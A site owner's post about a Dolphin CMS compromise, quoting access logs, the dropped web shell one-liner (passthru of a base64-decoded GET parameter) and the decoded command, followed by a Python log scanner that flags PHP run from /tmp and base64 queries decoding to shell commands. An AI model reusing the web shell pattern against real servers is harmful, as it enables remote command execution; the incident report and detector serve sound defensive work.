One of my websites was down this morning and I was able to find the reason: someone edited my /inc/admin.inc.php file and entered a ")" that produced a blank site because PHP threw an error on that.
I found two files in my /tmp folder, called a.php and admin.inc.php (which was the original, unmodified one).
In the /administration folder there was a file called wa.php, which is a file manager in one PHP file.
So, how was that possible?
After having a look at my server logs I saw that someone did a POST request to /administration/modules.php. Right after that he/she executed the a.php file in the /tmp folder with a URL query.
[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"
The content of the a.php file is something like "passthru(base64_decode($_GET['a']));".
After base64_decode, the query parameter "a" is something like "mv wa.php ../administration/wa.php".
Now he/she was able to execute the wa.php file and change every file inside the Dolphin installation. Lucky me that he/she only changed the admin.inc.php file to bring my site down.
[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"
Does anyone have an idea why this person was able to upload the files to the /tmp folder and how we can prevent those guys from doing this again?
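As a defender-side check, added here and not part of the post or of Dolphin itself: a Python script that scans access-log lines like the ones above for the two traces this attack left, a .php file requested under /tmp and a query parameter whose base64 decodes to a shell command. The embedded log lines are reconstructed from the post; the regexes, thresholds and function names are my own assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Access-log excerpt reconstructed from the post above (constructed sample, not a live log file).
SAMPLE_LOG = """\
[30/Oct/2016:20:47:03 +0000] "POST /administration/modules.php HTTP/1.0" 200 94709 "-" "-"
[30/Oct/2016:20:47:05 +0000] "GET /tmp/a.php?a=bXYgd2EucGhwIC4uL2FkbWluaXN0cmF0aW9uL3dhLnBocA== HTTP/1.0" 200 - "-" "-"
[30/Oct/2016:20:47:06 +0000] "GET /administration/wa.php HTTP/1.0" 200 89024 "-" "-"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Decoded text that starts with a common shell utility is treated as a command (assumed list).
SHELL_HINT = re.compile(r"^(mv|cp|rm|cat|ls|wget|curl|chmod|sh|bash|php|perl|python)\b")
# A .php script requested under the writable /tmp folder (the a.php stage in the post).
TMP_PHP_RE = re.compile(r"^/tmp/.*\.php$")


def decode_if_shell(value):
    """Base64-decode one query value; return the text if it looks like a shell command, else None."""
    value = unquote(value)
    value += "=" * (-len(value) % 4)  # tolerate padding stripped by the attacker's encoder
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() and SHELL_HINT.match(text) else None


def scan_line(line):
    """Return a list of (reason, detail) findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    findings = []
    if TMP_PHP_RE.match(parts.path):
        findings.append(("php executed from /tmp", parts.path))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            command = decode_if_shell(value)
            if command is not None:
                findings.append(("base64 query decodes to shell command", f"{name}={command}"))
    return findings


def scan(log_text):
    """Scan a whole log; returns [(line_number, reason, detail), ...] in log order."""
    return [(n, reason, detail)
            for n, line in enumerate(log_text.splitlines(), 1)
            for reason, detail in scan_line(line)]
```

Run it over a real access log with `scan(open(path).read())`; a hit on "php executed from /tmp" is itself the configuration problem to fix, since a writable upload folder should not be allowed to execute PHP at all.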